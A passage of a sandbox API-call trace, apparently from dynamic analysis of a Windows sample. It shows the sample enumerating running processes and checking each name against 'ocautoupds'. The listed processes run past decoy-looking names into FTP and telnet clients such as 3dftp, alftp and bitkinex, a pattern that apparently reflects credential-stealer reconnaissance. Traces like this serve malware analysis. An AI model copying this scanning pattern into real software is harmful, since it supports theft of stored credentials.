lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0094.394] StrStrIA (lpFirst="pending.exe", lpSrch="ocautoupds") returned 0x0 [0094.394] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0094.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.395] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a600 [0094.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356a600, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0094.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0094.395] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="ocautoupds") returned 0x0 [0094.395] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0094.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.397] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356d368 [0094.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x356d368, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0094.397] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0094.397] StrStrIA (lpFirst="swing prefer.exe", lpSrch="ocautoupds") returned 0x0 [0094.397] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0094.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.398] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a7b8 [0094.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356a7b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0094.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0094.398] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="ocautoupds") returned 0x0 [0094.398] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0094.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.399] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d188 [0094.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x356d188, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0094.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0094.400] StrStrIA (lpFirst="nights-attending.exe", lpSrch="ocautoupds") returned 0x0 [0094.400] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0094.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.401] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356c650 [0094.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356c650, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0094.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0094.401] StrStrIA (lpFirst="installed.exe", lpSrch="ocautoupds") returned 0x0 [0094.401] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0094.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.402] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a6c8 [0094.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356a6c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0094.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0094.402] StrStrIA (lpFirst="references compounds.exe", lpSrch="ocautoupds") returned 0x0 [0094.402] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0094.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.403] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d3e8 [0094.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x356d3e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0094.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0094.404] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="ocautoupds") returned 0x0 [0094.404] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0094.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.405] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d388 [0094.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x356d388, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0094.405] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0094.405] StrStrIA (lpFirst="registered try.exe", lpSrch="ocautoupds") returned 0x0 [0094.405] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0094.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.406] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a768 [0094.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356a768, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0094.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0094.406] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="ocautoupds") returned 0x0 [0094.406] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0094.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.407] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c5a8 [0094.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x356c5a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0094.408] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0094.408] StrStrIA (lpFirst="invite.exe", lpSrch="ocautoupds") returned 0x0 [0094.408] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0094.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.411] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356c560 [0094.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x356c560, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0094.411] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0094.411] StrStrIA (lpFirst="idol.exe", lpSrch="ocautoupds") returned 0x0 [0094.411] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0094.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.412] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a5d8 [0094.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356a5d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0094.412] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0094.412] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="ocautoupds") returned 0x0 [0094.413] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0094.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.414] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a448 [0094.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356a448, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0094.414] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0094.414] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="ocautoupds") returned 0x0 [0094.414] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0094.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.415] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356c668 [0094.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356c668, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0094.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0094.415] StrStrIA (lpFirst="powell_jane.exe", lpSrch="ocautoupds") returned 0x0 [0094.415] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0094.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.416] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d248 [0094.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x356d248, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0094.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0094.417] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="ocautoupds") returned 0x0 [0094.417] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0094.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.418] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356c470 [0094.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x356c470, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0094.418] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0094.418] StrStrIA (lpFirst="gainedshape.exe", lpSrch="ocautoupds") returned 0x0 [0094.418] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0094.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.419] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d268 [0094.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x356d268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0094.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0094.419] StrStrIA (lpFirst="opens-versions.exe", lpSrch="ocautoupds") returned 0x0 [0094.419] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0094.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.420] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a7e0 [0094.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356a7e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0094.420] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0094.421] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="ocautoupds") returned 0x0 [0094.421] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0094.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.422] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356c620 [0094.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x356c620, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.422] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0094.422] StrStrIA (lpFirst="3dftp.exe", lpSrch="ocautoupds") returned 0x0 [0094.422] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0094.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.435] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d288 [0094.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x356d288, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0094.435] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0094.435] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="ocautoupds") returned 0x0 [0094.435] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0094.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.437] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356c698 [0094.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x356c698, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.437] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0094.437] StrStrIA (lpFirst="alftp.exe", lpSrch="ocautoupds") returned 0x0 [0094.437] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0094.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.438] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356c578 [0094.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x356c578, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0094.438] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0094.438] StrStrIA (lpFirst="barca.exe", lpSrch="ocautoupds") returned 0x0 [0094.438] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0094.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 